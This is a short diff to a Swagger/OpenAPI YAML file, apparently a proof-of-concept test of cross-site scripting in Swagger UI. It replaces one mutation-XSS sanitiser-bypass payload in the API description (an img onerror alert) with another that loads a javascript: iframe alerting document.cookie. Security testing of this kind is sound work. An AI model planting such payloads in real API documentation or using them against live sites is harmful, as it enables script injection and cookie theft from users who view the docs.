--- a/xss.yaml
+++ b/xss.yaml
@@ -2,7 +2,7 @@ swagger: '2.0'
 info:
   title: Classic API Resource Documentation
   description: |
-    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('PoC-XSS') src=1>"></form>
+    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>"></form>
 
   version: production
 basePath: /JSSResource/
